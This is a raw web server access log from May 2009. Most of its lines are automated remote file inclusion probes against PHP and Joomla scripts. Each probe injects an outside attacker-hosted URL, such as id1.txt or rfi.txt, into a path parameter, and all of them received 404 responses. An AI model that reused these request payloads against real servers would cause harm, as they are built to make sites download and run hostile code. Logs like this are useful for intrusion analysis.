122.153.212.195 - - [17/May/2009:00:00:00 -0400] "GET /logs/access_log.Q108121400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:00:00:00 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:00:10 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
110.45.144.106 - - [17/May/2009:00:00:10 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.79"
110.45.144.106 - - [17/May/2009:00:00:10 -0400] "GET /logs/access_log.Q108091300/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
110.45.144.106 - - [17/May/2009:00:00:33 -0400] "GET /logs/access_log.Q109032900/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 282 "-" "libwww-perl/5.79"
61.221.52.220 - - [17/May/2009:00:01:39 -0400] "GET /logs/access_log.Q108082000//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.221.52.220 - - [17/May/2009:00:01:39 -0400] "GET /logs/access_log.Q108120600//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:00:01:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.97 - - [17/May/2009:00:02:21 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
123.125.64.38 - - [17/May/2009:00:02:58 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
63.111.105.6 - - [17/May/2009:00:03:52 -0400] "GET /logs/access_log.Q109050700//appserv/main.php?appserv_root=http://upfcorp.com/components/.bash/osy.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.800"
72.3.226.56 - - [17/May/2009:00:06:31 -0400] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:06:31 -0400] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:06:31 -0400] "GET /logs/access_log.Q108080900/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:00:06:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
8.20.84.15 - - [17/May/2009:00:06:58 -0400] "GET /logs/access_log.Q109022700 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
65.98.59.178 - - [17/May/2009:00:08:25 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:00:08:25 -0400] "GET //include/admin.lib.inc.php?site_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:00:08:25 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:08:52 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:08:52 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:08:52 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:00:09:10 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
217.147.29.190 - - [17/May/2009:00:09:22 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/sandy_zazmit/ab.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
217.147.29.190 - - [17/May/2009:00:09:23 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.geocities.com/sandy_zazmit/ab.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
72.3.226.56 - - [17/May/2009:00:09:23 -0400] "GET /logs/access_log.Q108090200/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:09:29 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
72.3.226.56 - - [17/May/2009:00:09:59 -0400] "GET /logs/access_log.Q108080900%20%20/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:10:38 -0400] "GET /logs/access_log.Q108101100%20%20//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:10:44 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:10:44 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:10:44 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:10:52 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:10:58 -0400] "GET /logs/access_log.Q108082800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:11:28 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:11:28 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:11:28 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:00:11:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.221.119.126 - - [17/May/2009:00:11:51 -0400] "GET /logs/access_log.Q108082800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:00:11:52 -0400] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:00:11:52 -0400] "GET /logs/access_log.Q108081800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:00:11:52 -0400] "GET /logs/access_log.Q108060200///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:00:11:52 -0400] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
65.98.59.178 - - [17/May/2009:00:12:20 -0400] "GET /logs/access_log.Q108101100%20%20//include/admin.lib.inc.php?site_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:12:28 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:12:28 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:12:28 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:12:32 -0400] "GET /logs/access_log.Q108091400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.72.114 - - [17/May/2009:00:12:37 -0400] "GET /logs/error_log.Q108040200 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.98.59.178 - - [17/May/2009:00:12:43 -0400] "GET /logs/access_log.Q109050700%20%20//include/admin.lib.inc.php?site_path=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
78.143.46.123 - - [17/May/2009:00:13:09 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.143.46.123 - - [17/May/2009:00:13:09 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
78.143.46.123 - - [17/May/2009:00:13:09 -0400] "GET /logs/error_log.Q108112100%20%20//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
78.143.46.123 - - [17/May/2009:00:13:10 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.143.46.123 - - [17/May/2009:00:13:11 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
78.143.46.123 - - [17/May/2009:00:13:11 -0400] "GET /logs/error_log.Q108112100%20%20//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
38.99.65.50 - - [17/May/2009:00:13:17 -0400] "GET /logs/access_log.Q108111700 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 (.NET CLR 3.5.30729)"
58.227.193.198 - - [17/May/2009:00:13:28 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
88.191.103.144 - - [17/May/2009:00:13:32 -0400] "GET /logs/access_log.Q108082800%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
78.143.46.123 - - [17/May/2009:00:14:02 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.143.46.123 - - [17/May/2009:00:14:02 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
78.143.46.123 - - [17/May/2009:00:14:02 -0400] "GET /logs/error_log.Q108112100//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
85.214.86.93 - - [17/May/2009:00:14:06 -0400] "GET /logs/access_log.Q108052400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
78.143.46.123 - - [17/May/2009:00:14:10 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
78.143.46.123 - - [17/May/2009:00:14:10 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
78.143.46.123 - - [17/May/2009:00:14:10 -0400] "GET /logs/error_log.Q108112100//include/print_category.php?setup[use_category]=1&dir=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:14:35 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:14:35 -0400] "GET /logs/access_log.Q108091400//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:14:35 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
193.221.119.126 - - [17/May/2009:00:15:04 -0400] "GET /logs/access_log.Q108091400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:15:37 -0400] "GET /logs/access_log.Q108101100%20%20//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
122.153.212.195 - - [17/May/2009:00:16:05 -0400] "GET /logs/access_log.Q109012800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sherif-dudulz.ucoz.com/id1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:16:11 -0400] "GET /logs/access_log.Q108082800//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:16:14 -0400] "GET /logs/error_log.Q108091600%20%20//include/admin.lib.inc.php?site_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.232.102.70 - - [17/May/2009:00:16:37 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:16:37 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:16:37 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
209.59.12.99 - - [17/May/2009:00:16:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.232.102.70 - - [17/May/2009:00:16:52 -0400] "GET /logs/access_log.Q109020800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
193.221.119.126 - - [17/May/2009:00:16:53 -0400] "GET /logs/access_log.Q108082800%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.129.119.47 - - [17/May/2009:00:16:55 -0400] "GET /logs/access_log.Q108121000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
217.218.92.10 - - [17/May/2009:00:17:04 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
217.218.92.10 - - [17/May/2009:00:17:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
217.218.92.10 - - [17/May/2009:00:17:18 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
217.218.92.10 - - [17/May/2009:00:17:18 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/contact.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
66.232.102.70 - - [17/May/2009:00:18:36 -0400] "GET /logs/access_log.Q109013100%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.813"
221.157.225.65 - - [17/May/2009:00:18:37 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
221.157.225.65 - - [17/May/2009:00:18:37 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
221.157.225.65 - - [17/May/2009:00:18:37 -0400] "GET /logs/access_log.Q109051200//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:19:09 -0400] "GET /logs/access_log.Q109042200%20%20/main.php?x=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:19:09 -0400] "GET /logs/main.php?x=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:19:09 -0400] "GET /main.php?x=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:19:24 -0400] "GET /logs/access_log.Q109032500%20%20/main.php?x=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
221.157.225.65 - - [17/May/2009:00:19:26 -0400] "GET /logs/access_log.Q109022600//include/print_category.php?setup[use_category]=1&dir=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:19:28 -0400] "GET /main.php?x=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:19:28 -0400] "GET /logs/main.php?x=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:19:28 -0400] "GET /logs/access_log.Q109042200%20%20/main.php?x=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:19:30 -0400] "GET /logs/access_log.Q109032500%20%20/main.php?x=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.227.193.198 - - [17/May/2009:00:21:25 -0400] "GET /logs/access_log.Q108091400%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
209.59.12.99 - - [17/May/2009:00:21:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.144.106 - - [17/May/2009:00:21:57 -0400] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:21:57 -0400] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
110.45.144.106 - - [17/May/2009:00:21:57 -0400] "GET /logs/access_log.Q109050900/components/com_performs/performs.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:00:22:05 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:00:22:05 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/ask_password.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:00:22:05 -0400] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:00:22:08 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/ask_password.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:00:22:08 -0400] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:00:22:08 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:00:22:11 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:00:22:12 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/ask_password.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:00:22:12 -0400] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
66.232.102.70 - - [17/May/2009:00:22:24 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:22:24 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:22:24 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
66.232.102.70 - - [17/May/2009:00:22:24 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.813"
110.45.144.106 - - [17/May/2009:00:22:53 -0400] "GET /logs/access_log.Q109051000/components/com_performs/performs.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.143.98.5 - - [17/May/2009:00:23:50 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/ask_password.php?dir=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
123.143.98.5 - - [17/May/2009:00:23:50 -0400] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
123.143.98.5 - - [17/May/2009:00:23:50 -0400] "GET ///skin/zero_vote/ask_password.php?dir=http://www.steannareptile.it//administrator/id.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
58.227.193.198 - - [17/May/2009:00:23:53 -0400] "GET /logs/access_log.Q108082900%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.laxestereo.com/parranda/copyright.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.129.119.17 - - [17/May/2009:00:24:54 -0400] "GET /logs/error_log.Q108101400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.232.102.70 - - [17/May/2009:00:24:55 -0400] "GET /logs/access_log.Q109013100%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 236 "-" "libwww-perl/5.813"
110.45.144.106 - - [17/May/2009:00:25:03 -0400] "GET /logs/access_log.Q109050900%20%20/components/com_performs/performs.php?mosConfig_absolute_path=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
